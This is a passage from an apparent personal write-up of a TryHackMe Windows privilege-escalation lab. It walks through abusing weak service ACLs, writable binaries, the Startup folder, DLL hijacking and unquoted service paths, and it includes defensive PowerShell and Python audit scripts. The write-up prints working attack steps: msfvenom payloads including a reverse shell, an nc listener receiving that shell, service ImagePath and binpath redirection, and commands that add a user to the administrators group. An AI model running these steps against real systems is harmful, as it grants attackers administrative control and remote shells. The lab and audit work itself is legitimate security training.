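HEADER = re.compile(r"^O:(?P<owner>[\w-]+)G:(?P<group>[\w-]+)D:(?P<flags>[A-Z]*)(?P<aces>(?:\([^)]*\))*)")
ACE = re.compile(r"\(([^)]*)\)")


def rights_tokens(rights):
    """SDDL rights are a run of two-letter tokens (e.g. 'KRKW') or a hex mask."""
    if rights.lower().startswith("0x"):
        return {rights.lower()}
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def parse_sddl(sddl):
    """Return (owner, group, dacl_flags, aces); each ACE is a dict of its fields."""
    m = HEADER.match(sddl)
    if not m:
        raise ValueError("SDDL layout not handled by this example: " + sddl)
    aces = []
    for body in ACE.findall(m.group("aces")):
        ace_type, flags, rights, _obj, _inherit_obj, sid = body.split(";")[:6]
        aces.append({"type": ace_type, "flags": flags, "rights": rights, "sid": sid})
    return m.group("owner"), m.group("group"), m.group("flags"), aces


def full_control_holders(sddl):
    """SIDs granted full control by an access-allowed (type 'A') ACE."""
    _, _, _, aces = parse_sddl(sddl)
    return [a["sid"] for a in aces if a["type"] == "A" and FULL_CONTROL & rights_tokens(a["rights"])]


def weak_service_key_acl(sddl):
    """Names of low-privilege trustees with full control over the key."""
    return [SID_NAMES.get(s, s) for s in full_control_holders(sddl) if s in LOW_PRIV]


if __name__ == "__main__":
    print("regsvc  :", weak_service_key_acl(SDDL_REGSVC))    # ['NT AUTHORITY\\INTERACTIVE']
    print("hardened:", weak_service_key_acl(SDDL_HARDENED))  # []
```

On a real host the SDDL strings would come from `Get-Acl` over `HKLM:\SYSTEM\CurrentControlSet\Services\*`; any non-empty result from `weak_service_key_acl` is a service whose ImagePath a standard user can redirect.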
Podemos entonces añadir un ejecutable malicioso a este servicio para que lo ejecute por nosotros :) ### Explotación - regsvc Nos traemos de la máquina windows el archivo windows_service.c ```bash ┌──(aml㉿kali)-[~/TryHackMe] └─$ python -m pyftpdlib -p 21 --write /home/aml/.local/lib/python3.10/site-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user. warnings.warn("write permissions assigned to anonymous user.", [I 2022-11-25 19:15:19] concurrency model: async [I 2022-11-25 19:15:19] masquerade (NAT) address: None [I 2022-11-25 19:15:19] passive ports: None [I 2022-11-25 19:15:19] >>> starting FTP server on 0.0.0.0:21, pid=34038 <<< [I 2022-11-25 19:15:22] 10.10.168.218:49353-[] FTP session opened (connect) [I 2022-11-25 19:15:26] 10.10.168.218:49353-[anonymous] USER 'anonymous' logged in. [I 2022-11-25 19:15:32] 10.10.168.218:49353-[anonymous] STOR /home/aml/TryHackMe/windows_service.c completed=1 bytes=2043 seconds=0.127 [I 2022-11-25 19:15:39] 10.10.168.218:49353-[anonymous] FTP session closed (disconnect). ^C[I 2022-11-25 19:16:21] received interrupt signal [I 2022-11-25 19:16:21] >>> shutting down FTP server, 1 socket(s), pid=34038 <<< ``` ```bash PS C:\Users\user\Desktop\Tools\Source> ftp 10.8.32.108 Connected to 10.8.32.108. 220 pyftpdlib 1.5.7 ready. User (10.8.32.108:(none)): anonymous 331 Username ok, send password. Password: 230 Login successful. ftp> put windows_service.c 200 Active data connection established. 125 Data connection already open. Transfer starting. 226 Transfer complete. ftp: 2043 bytes sent in 0.05Seconds 43.47Kbytes/sec. ftp> quit 221 Goodbye. 
```

We then edit the malicious script (which is set up to run a whoami) so that it runs the following instead: `cmd.exe /k net localgroup administrators user /add`

Then we compile it for Windows:

```bash
┌──(aml㉿kali)-[~/TryHackMe]
└─$ x86_64-w64-mingw32-gcc windows_service.c -o x.exe

┌──(aml㉿kali)-[~/TryHackMe]
└─$ ls
rev.exe  rev.msi  windows_service.c  x.exe
```

We upload it and leave it in C:\Temp. Now we add it to the service with: `reg add HKLM\SYSTEM\CurrentControlSet\Services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f` and start the service with `sc start regsvc`. Running `net localgroup administrators` shows that the user belongs to the group.

...

...

But I don't think it worked for me :( It's important to do it from cmd, not from PS. Something in my payload must have failed, though, because not even launching it as admin adds me to the group...

## Executable Files - THM windowsprivescarena

We're still in the same THM room.

```bash
┌──(aml㉿kali)-[~]
└─$ xfreerdp /u:user /v:10.10.193.68 /cert:ignore ## password321
```

### Enumeration

We load PowerUp.ps1 and run Invoke-AllChecks:

```powershell
PS C:\Users\user\Desktop\Tools\PowerUp> powershell -ep bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\user\Desktop\Tools\PowerUp> . .\PowerUp.ps1
PS C:\Users\user\Desktop\Tools\PowerUp> Invoke-AllChecks

[ ... ]

[*] Checking service executable and argument permissions...
ServiceName                     : filepermsvc
Path                            : "C:\Program Files\File Permissions Service\filepermservice.exe"
ModifiableFile                  : C:\Program Files\File Permissions Service\filepermservice.exe
ModifiableFilePermissions       : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'filepermsvc'
CanRestart                      : True
```

Another way is with *accesschk64.exe*:

```powershell
PS C:\Users\user\Desktop\Tools\Accesschk> .\accesschk64.exe -wvu "C:\Program FIles\File Permissions Service"

Accesschk v6.10 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program FIles\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
PS C:\Users\user\Desktop\Tools\Accesschk>
```

And we see that Everyone has *FILE_ALL_ACCESS* on "File Permissions Service". That's it! The thing is, hitting the right spot by hand is hard, so PowerUp helps with that.

### Exploitation

Knowing all of the above, all we have to do is upload an executable to the machine and overwrite the vulnerable one (filepermservice.exe) with it.
Let's create the .exe with msfvenom:

```bash
┌──(aml㉿kali)-[~/HTB]
└─$ msfvenom -p windows/x64/exec CMD='cmd.exe /k "net localgroup administrators user /add" -f exe' > ../TryHackMe/useraddx64.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 327 bytes

```

We stop the service we're going to replace:

```batch
C:\Users\user>sc stop filepermsvc

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
```

And we upload it, overwriting the original:

![](https://i.imgur.com/cw12Ubm.png)

We start the service again and... it fails:

```bash
C:\Users\user>sc start filepermsvc
[SC] StartService FAILED with error 216.
```

It seems the msfvenom exe isn't to its liking. Let's try our old *x.exe* and see...

```bash
C:\Users\user>sc stop filepermsvc

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

C:\Users\user>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
TCM
The command completed successfully.
C:\Users\user>sc start filepermsvc

SERVICE_NAME: filepermsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2800
        FLAGS              :

C:\Users\user>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
TCM
user
The command completed successfully.
```

We're in administrators now!!

## StartUp Applications

This one is quite interesting, because PowerUp.ps1 doesn't flag this flaw, so it always has to be tested by hand. Thankfully, it's just a matter of checking the permissions on one folder (and, if need be, on the files inside it in case that works too).

### Enumeration

We check what permissions we have on the Startup folder:

```powershell
C:\Users\user>icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup BUILTIN\Users:(F)
                                                             TCM-PC\TCM:(I)(OI)(CI)(DE,DC)
                                                             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                             BUILTIN\Administrators:(I)(OI)(CI)(F)
                                                             BUILTIN\Users:(I)(OI)(CI)(RX)
                                                             Everyone:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
```

The **F** means Full Access, so everyone in "BUILTIN\Users" (that is, every user) can apparently write here... :)

### Exploitation

As always: take a malicious exe, upload it to that folder and wait for an administrator to log in. Let's try msfvenom to launch a reverse shell and see if it works: `msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=80 -f exe > rev.exe`

We upload it to the machine and paste it into that folder. We set nc listening. We log out of the machine and log back in:

```bash
┌──(aml㉿kali)-[~/TryHackMe]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [10.8.32.108] from (UNKNOWN) [10.10.110.242] 49226
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
tcm-pc\tcm

C:\Windows\system32>hostname
hostname
TCM-PC
```

That was easy.

## DLL Hijacking

### Enumeration

We open the Windows "Process Monitor" tool (it doesn't ship with Windows) as admin to see what's going on. We go to *Filters* and add a filter "Result - is - NAME NOT FOUND" as shown in the image, and click "Add":

![](https://i.imgur.com/T2gLmCh.png)

Another filter with "Path - ends with - .dll". We hit apply and it shows us a few DLLs matching what we're looking for.

![](https://i.imgur.com/DfRLTlb.png)

Since their result is "NAME NOT FOUND" and the process is trying to locate them, we can try to plant the DLL ourselves if we can control the service and the location is writable.

If we stop the dllsvc service and start it again (magical thinking for now), we'll see new events show up in procmon:

![](https://i.imgur.com/0KSnees.png)

One of the not-found entries is in *C:\Program Files* and another in *C:\Temp*. These tend to be writable directories :)

### Exploitation

We take the *windows_dll.c* file, drop one of our payloads into it and impersonate one of these DLLs. Let's go!

In the .c we make it add our user to the administrators group, save, compile, upload, save it as *hijackme.dll* in c:\Temp and...

![](https://i.imgur.com/v0v305V.png)

We've got it!

## Service permissions (Binary Paths)

### Enumeration

Manually we can run: `accesschk64.exe -uvcw Everyone *`

* -u: Don't show errors or negative findings.
* -v: Verbose
* -c: Show the service name
* -w: Only show objects with write permissions
* Everyone: The group the above permissions are checked for

```bash!
C:\Users\user\Desktop\Tools\Accesschk>accesschk64.exe -uvcw Everyone *

Accesschk v6.10 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

RW daclsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        "SERVICE_CHANGE_CONFIG"
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
```

From PowerUp.ps1 we can see it under the *Checking service permissions* section:

```bash
[*] Checking service permissions...

ServiceName   : daclsvc
Path          : "C:\Program Files\DACL Service\daclservice.exe"
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'daclsvc'
CanRestart    : True
```

### Exploitation with PowerUp.ps1

With *PowerUp.ps1* it's really simple. Just do what AllChecks tells us:

```bash!
PS C:\Users\user\Desktop\Tools\PowerUp> Invoke-ServiceAbuse -Name 'daclsvc'

ServiceAbused Command
------------- -------
daclsvc       net user john Password123! /add && n...

PS C:\Users\user\Desktop\Tools\PowerUp> net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
TCM
The command completed successfully.
```

And that's it.

### Manual exploitation

More by hand it would go like this. Let's look at more info about the service:

```bash
C:\Users\user\Desktop\Tools\Accesschk>sc qc daclsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```

Since we have the SERVICE_CHANGE_CONFIG permission, we can change the configuration shown by that last command, for example changing the executable it launches... :)
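The accesschk output above is the attacker's view of the service DACL; the same information is available to a defender from `sc.exe sdshow`. The following added PowerShell example (mine, not the course's or the room's code) parses that SDDL for every service and reports Allow ACEs that give a broad group a right allowing reconfiguration, which is exactly what makes daclsvc abusable. The group-alias table and the set of rights treated as dangerous are my choices.

```powershell
# Added audit example (not from the course): read each service's security
# descriptor with "sc.exe sdshow" and report Allow ACEs that grant a broad group
# a right that lets it reconfigure the service.
# SDDL right abbreviations for service objects:
#   DC = SERVICE_CHANGE_CONFIG   WD = WRITE_DAC   WO = WRITE_OWNER
#   GA = GENERIC_ALL             GW = GENERIC_WRITE (both include change-config)
# Note that "WD" is also the SID alias for Everyone; the two sit in different
# ACE fields, so there is no ambiguity when parsing.

$DangerousRights = @('DC', 'WD', 'WO', 'GA', 'GW')
$LowPrivSids = @{            # SDDL aliases for groups that should not reconfigure services
    'WD' = 'Everyone'
    'BU' = 'BUILTIN\Users'
    'AU' = 'NT AUTHORITY\Authenticated Users'
    'IU' = 'NT AUTHORITY\INTERACTIVE'
}

function Get-DangerousServiceAce {
    param([string]$ServiceName, [string]$Sddl)
    # Keep only the DACL ("D:...") part; a SACL ("S:...") describes auditing, not access.
    $dacl = if ($Sddl -match 'D:(?<dacl>.*?)(S:|$)') { $Matches['dacl'] } else { '' }
    foreach ($m in [regex]::Matches($dacl, '\((?<ace>[^)]*)\)')) {
        # ACE fields: type;flags;rights;object_guid;inherit_object_guid;sid
        $f = $m.Groups['ace'].Value -split ';'
        if ($f.Count -lt 6 -or $f[0] -ne 'A') { continue }      # only Allow ACEs
        if (-not $LowPrivSids.ContainsKey($f[5])) { continue }
        if ($f[2] -like '0x*') {
            # Rights given as a hex access mask instead of letter pairs.
            $mask = [Convert]::ToInt64($f[2].Substring(2), 16)
            $rights = @()
            if ($mask -band 0x2)        { $rights += 'DC' }
            if ($mask -band 0x40000)    { $rights += 'WD' }
            if ($mask -band 0x80000)    { $rights += 'WO' }
            if ($mask -band 0x10000000) { $rights += 'GA' }
            if ($mask -band 0x40000000) { $rights += 'GW' }
        } else {
            # Letter-pair form, e.g. CCDCLCSWRPWPDTLOCRRC -> CC, DC, LC, ...
            $rights = [regex]::Matches($f[2], '..') | ForEach-Object { $_.Value }
        }
        $bad = @($rights | Where-Object { $DangerousRights -contains $_ })
        if ($bad.Count -gt 0) {
            [pscustomobject]@{ Service = $ServiceName; Identity = $LowPrivSids[$f[5]]; Rights = ($bad -join ',') }
        }
    }
}

function Get-WeakServiceDacl {
    foreach ($svc in Get-Service) {
        # sc.exe prints a blank line and then the whole SDDL on one line.
        $sddl = (& sc.exe sdshow $svc.Name 2>$null | Where-Object { $_ -match '^D:' }) -join ''
        if ($sddl) { Get-DangerousServiceAce -ServiceName $svc.Name -Sddl $sddl }
    }
}

# Constructed sample (not taken from the THM box): Everyone holds DC alongside the
# usual query/start/stop rights, so the first ACE is reported; SY and BA are not.
$sampleSddl = 'D:(A;;CCDCLCSWRPWPDTLOCRRC;;;WD)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)'
Get-DangerousServiceAce -ServiceName 'sample' -Sddl $sampleSddl | Format-Table -AutoSize
Get-WeakServiceDacl | Format-Table -AutoSize
```

Every service reported here can be fixed by writing back a corrected descriptor with `sc.exe sdset <name> <sddl>` from an elevated prompt, keeping the usual CC/LC/SW/RP/WP/DT/LO/CR/RC rights for the broad group and removing DC, WD, WO and the generic rights.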
```bash
C:\Users\user\Desktop\Tools\Accesschk>sc config daclsvc binpath= "net localgroup administrators user /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\user\Desktop\Tools\Accesschk>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
TCM
The command completed successfully.

C:\Users\user\Desktop\Tools\Accesschk>sc start daclsvc
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\Users\user\Desktop\Tools\Accesschk>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
john
TCM
user
The command completed successfully.
```

*user* now belongs to administrators :)

## Service permissions (Unquoted Paths)

### Enumeration

Similar to the previous one, but in this case what happens is that the path isn't wrapped in quotes. We can see it in *PowerUp.ps1* under:

```bash
[*] Checking for unquoted service paths...
ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False

ServiceName    : AWSLiteAgent
Path           : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart     : False

ServiceName    : unquotedsvc
Path           : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=AppendData/AddSubdirectory; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart     : True

ServiceName    : unquotedsvc
Path           : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
ModifiablePath : @{Permissions=System.Object[]; ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'unquotedsvc' -Path <HijackPath>
CanRestart     : True
```

### Exploitation

The trick here is that, when it tries to launch the command "C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe", it will first try to launch C.exe, then C:\Program.exe, then C:\Program Files\Unquoted.exe, and so on... So let's see where we have write permissions, and we'll create a malicious .exe there.
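Three of the findings in this room come down to the same file-system question: can a low-privileged principal write where a privileged service or logon will later execute from? The added PowerShell audit below (my example, not code from the course, the THM room or PowerUp) answers it in one pass for the writable service binary (filepermsvc), the unquoted service path (unquotedsvc) and the all-users Startup folder. It enumerates the candidate paths CreateProcess probes for an unquoted path with spaces, which for the unquotedsvc path are `C:\Program.exe`, `C:\Program Files\Unquoted.exe`, `C:\Program Files\Unquoted Path.exe` and so on, and reports a candidate only when its parent directory actually accepts new files. The identity list and rights mask are my choices; the AppendData right that PowerUp reports for `C:\` is deliberately left out of the mask, because creating a subdirectory does not allow creating `C:\Program.exe`.

```powershell
# Added audit example (not from the course or PowerUp). Reports, for every
# service, (1) a binary writable by low-privileged principals, (2) unquoted-path
# hijack candidates whose parent directory accepts new files, and (3) a writable
# all-users Startup folder. Each hit is a hardening finding to fix with icacls.

$LowPrivIdentities = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal replace a file or drop a new file into a directory
# (WriteData on a directory is "create files"). AppendData is left out on purpose.
$FsWriteRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
                 [System.Security.AccessControl.FileSystemRights]::Delete -bor
                 [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                 [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-LowPrivWriters {
    # Returns the low-privileged identities holding write-class rights on $Path.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return @() }
    @($acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $LowPrivIdentities -contains $_.IdentityReference.Value -and
                       (($_.FileSystemRights -band $FsWriteRights) -ne 0) } |
        ForEach-Object { $_.IdentityReference.Value } |
        Sort-Object -Unique)
}

function Get-ServiceExecutable {
    # Extracts the executable from a service PathName, quoted or not, without arguments.
    param([string]$PathName)
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    $end = $PathName.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    if ($end -ge 0) { return $PathName.Substring(0, $end + 4) }
    return $PathName.Split(' ')[0]
}

function Get-UnquotedPathCandidates {
    # For an unquoted path with spaces, CreateProcess tries every space-delimited
    # prefix with ".exe" appended before reaching the real binary.
    param([string]$PathName)
    if ($PathName.StartsWith('"')) { return @() }            # quoted path: nothing to guess
    $exe = Get-ServiceExecutable -PathName $PathName
    if ($exe -notmatch ' ') { return @() }
    $parts = $exe -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Get-ServiceFileRisks {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }

        # 1. The binary itself can be overwritten (accesschk's FILE_ALL_ACCESS for Everyone).
        $exe = Get-ServiceExecutable -PathName $svc.PathName
        $writers = Get-LowPrivWriters -Path $exe
        if ($writers) {
            [pscustomobject]@{ Service = $svc.Name; Kind = 'WritableBinary'; Path = $exe
                               WritableBy = ($writers -join ', '); RunsAs = $svc.StartName }
        }

        # 2. A hijack candidate only matters if its parent directory accepts new files.
        foreach ($cand in Get-UnquotedPathCandidates -PathName $svc.PathName) {
            $writers = Get-LowPrivWriters -Path (Split-Path -Path $cand -Parent)
            if ($writers) {
                [pscustomobject]@{ Service = $svc.Name; Kind = 'UnquotedPath'; Path = $cand
                                   WritableBy = ($writers -join ', '); RunsAs = $svc.StartName }
            }
        }
    }

    # 3. Anything dropped in the all-users Startup folder runs at every interactive logon.
    $startup = [Environment]::GetFolderPath('CommonStartup')
    $writers = Get-LowPrivWriters -Path $startup
    if ($writers) {
        [pscustomobject]@{ Service = '(n/a)'; Kind = 'StartupFolder'; Path = $startup
                           WritableBy = ($writers -join ', '); RunsAs = 'every user who logs on' }
    }
}

Get-ServiceFileRisks | Format-Table -AutoSize -Wrap
```

The unquoted-path finding is usually fixed by quoting `ImagePath` (`sc.exe config <name> binPath= "\"C:\full path\service.exe\""`), the other two by tightening the ACL of the binary or folder with `icacls` so that only SYSTEM and Administrators can write. Note that the Startup check is the one PowerUp does not perform, which is the reason the room has you run icacls by hand.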
```bash
┌──(aml㉿kali)-[~/TryHackMe]
└─$ i686-w64-mingw32-gcc windows_service.c -o useradd.exe
```

![](https://i.imgur.com/mUqHEND.png)

And done!

## Challenge Steel Mountain (THM)

I don't have THM premium, so that's for another day. In any case, it seems I already did it in the past..